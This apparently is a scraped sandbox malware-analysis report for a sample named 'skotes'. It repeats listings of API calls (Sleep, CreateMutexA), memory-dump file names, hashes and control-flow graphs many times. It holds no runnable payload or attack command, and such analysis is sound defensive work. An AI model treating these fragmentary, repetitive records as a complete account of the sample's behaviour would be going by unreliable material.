• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724
• Opcode ID: 4ad5aa728c36e212d2aa9e049c58b27a9d24e856f5267d7c1f753b7cfa5afc93
• Instruction ID: 0265e3bef4796825eda82254795f3cd324892ca7bd587d40dae86302e7e227cd
• Opcode Fuzzy Hash: 4ad5aa728c36e212d2aa9e049c58b27a9d24e856f5267d7c1f753b7cfa5afc93
• Instruction Fuzzy Hash: 4B312E71A14208CBEB18ABBCDC897BEB7B3EB85314F248259E1149B3D6C77959808761

Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph 22 6f9f44-6f9f64 26 6f9f66-6f9f72 22->26 27 6f9f92-6f9fae 22->27 30 6f9f88-6f9f8f call 70d663 26->30 31 6f9f74-6f9f82 26->31 28 6f9fdc-6f9ffb 27->28 29 6f9fb0-6f9fbc 27->29 35 6f9ffd-6fa009 28->35 36 6fa029-6fa916 call 7080c0 28->36 33 6f9fbe-6f9fcc 29->33 34 6f9fd2-6f9fd9 call 70d663 29->34 30->27 31->30 37 6fa92b 31->37 33->34 33->37 34->28 42 6fa01f-6fa026 call 70d663 35->42 43 6fa00b-6fa019 35->43 39 6fa953-6fa994 Sleep CreateMutexA 37->39 40 6fa92b call 726c6a 37->40 52 6fa9a7-6fa9a8 39->52 53 6fa996-6fa998 39->53 40->39 42->36 43->37 43->42 53->52 54 6fa99a-6fa9a5 53->54 54->52
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724

Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724

Control-flow Graph (interactive graph not reproduced; legend: Executed / Not Executed)
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724

Control-flow Graph
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 61241171f88a5f1f2bf6b1beda5da3680e1f94a0c3a605e548f36058a34a260b
                                                                                                                                                                                                                                • Instruction ID: 88f6e306d6841c45f9ef1f66293c9e1aeb58a94b0b111a36009c7723bdeeeef0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61241171f88a5f1f2bf6b1beda5da3680e1f94a0c3a605e548f36058a34a260b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44313C71A10208DBEB18ABFCD8897BDB7B3EBC1314F204259E1589B3D5C7B959C08662

Control-flow Graph

control_flow_graph 164 6fa54d-6fa56d 168 6fa56f-6fa57b 164->168 169 6fa59b-6fa5b7 164->169 170 6fa57d-6fa58b 168->170 171 6fa591-6fa598 call 70d663 168->171 172 6fa5b9-6fa5c5 169->172 173 6fa5e5-6fa604 169->173 170->171 174 6fa944-6fa949 call 726c6a 170->174 171->169 176 6fa5db-6fa5e2 call 70d663 172->176 177 6fa5c7-6fa5d5 172->177 178 6fa606-6fa612 173->178 179 6fa632-6fa916 call 7080c0 173->179 190 6fa94e 174->190 191 6fa949 call 726c6a 174->191 176->173 177->174 177->176 183 6fa628-6fa62f call 70d663 178->183 184 6fa614-6fa622 178->184 183->179 184->174 184->183 194 6fa953-6fa994 Sleep CreateMutexA 190->194 195 6fa94e call 726c6a 190->195 191->190 198 6fa9a7-6fa9a8 194->198 199 6fa996-6fa998 194->199 195->194 199->198 200 6fa99a-6fa9a5 199->200 200->198
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724
• Opcode ID: 7e6f0018411656e007e4df30f64384b83417244871a973bf3d8e5fb5c2877ef3
• Instruction ID: 416985c48a03ce617fd3a1c2786ee4cb0511d4d4baaa3be3f0b9869f36ba08e3
• Opcode Fuzzy Hash: 7e6f0018411656e007e4df30f64384b83417244871a973bf3d8e5fb5c2877ef3
• Instruction Fuzzy Hash: 4F3109B1A10208CBEB18ABF8DC897BDB763ABC5314F248259E518DB3D5C77999808612

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 202 6fa682-6fa6a2 206 6fa6a4-6fa6b0 202->206 207 6fa6d0-6fa6ec 202->207 208 6fa6c6-6fa6cd call 70d663 206->208 209 6fa6b2-6fa6c0 206->209 210 6fa6ee-6fa6fa 207->210 211 6fa71a-6fa739 207->211 208->207 209->208 212 6fa949 209->212 214 6fa6fc-6fa70a 210->214 215 6fa710-6fa717 call 70d663 210->215 216 6fa73b-6fa747 211->216 217 6fa767-6fa916 call 7080c0 211->217 218 6fa94e 212->218 219 6fa949 call 726c6a 212->219 214->212 214->215 215->211 223 6fa75d-6fa764 call 70d663 216->223 224 6fa749-6fa757 216->224 225 6fa953-6fa994 Sleep CreateMutexA 218->225 226 6fa94e call 726c6a 218->226 219->218 223->217 224->212 224->223 234 6fa9a7-6fa9a8 225->234 235 6fa996-6fa998 225->235 226->225 235->234 236 6fa99a-6fa9a5 235->236 236->234
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724
• Opcode ID: 6f859f9652482fbc6929c291dfa39b5d1d26478b8011320faf9d91b4c8ccbe47
• Instruction ID: 9ed035d883eb45ac802d0ce28a54950edf36355f9054645b38c5f2aa8b40bde3
• Opcode Fuzzy Hash: 6f859f9652482fbc6929c291dfa39b5d1d26478b8011320faf9d91b4c8ccbe47
• Instruction Fuzzy Hash: E3314071610208CBEB18EBFCDC89BBDB773EB85314F248259E518D73D5C77959808652

Control-flow Graph

APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: a4eb34835a9c2639dc4edb8961b79b2dd141d6f62be1d349965669f740cc91b1
                                                                                                                                                                                                                                • Instruction ID: 4066ab7c8760c8121692bdcf4ca0f2573bef63e4634e7e0099d2d187319f2c78
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4eb34835a9c2639dc4edb8961b79b2dd141d6f62be1d349965669f740cc91b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A213D71A14204DBEB18ABACEC897BDF763EBC1314F104269E518C73D5C7B959808611

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 306 6fa856-6fa86e 307 6fa89c-6fa89e 306->307 308 6fa870-6fa87c 306->308 311 6fa8a9-6fa8b1 call 6f7d30 307->311 312 6fa8a0-6fa8a7 307->312 309 6fa87e-6fa88c 308->309 310 6fa892-6fa899 call 70d663 308->310 309->310 313 6fa94e 309->313 310->307 323 6fa8e4-6fa8e6 311->323 324 6fa8b3-6fa8bb call 6f7d30 311->324 315 6fa8eb-6fa916 call 7080c0 312->315 317 6fa953-6fa987 Sleep CreateMutexA 313->317 318 6fa94e call 726c6a 313->318 325 6fa98e-6fa994 317->325 318->317 323->315 324->323 330 6fa8bd-6fa8c5 call 6f7d30 324->330 328 6fa9a7-6fa9a8 325->328 329 6fa996-6fa998 325->329 329->328 331 6fa99a-6fa9a5 329->331 330->323 335 6fa8c7-6fa8cf call 6f7d30 330->335 331->328 335->323 338 6fa8d1-6fa8d9 call 6f7d30 335->338 338->323 341 6fa8db-6fa8e2 338->341 341->315
APIs
• Sleep.KERNELBASE(00000064), ref: 006FA963
• CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724
• Opcode ID: ec1f7670c1cf13c06ea0aa5033e995658c538648827e837cf9f653f731e48bbb
• Instruction ID: e41368c251dbb0f7bbd6279a1b3451ebdca7ec9705db680403df75721145d682
• Opcode Fuzzy Hash: ec1f7670c1cf13c06ea0aa5033e995658c538648827e837cf9f653f731e48bbb
• Instruction Fuzzy Hash: 03216AB164520DDAFB6467F8988B7BEB2639F81340F24481AE71CD73D1CBFA58818153

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
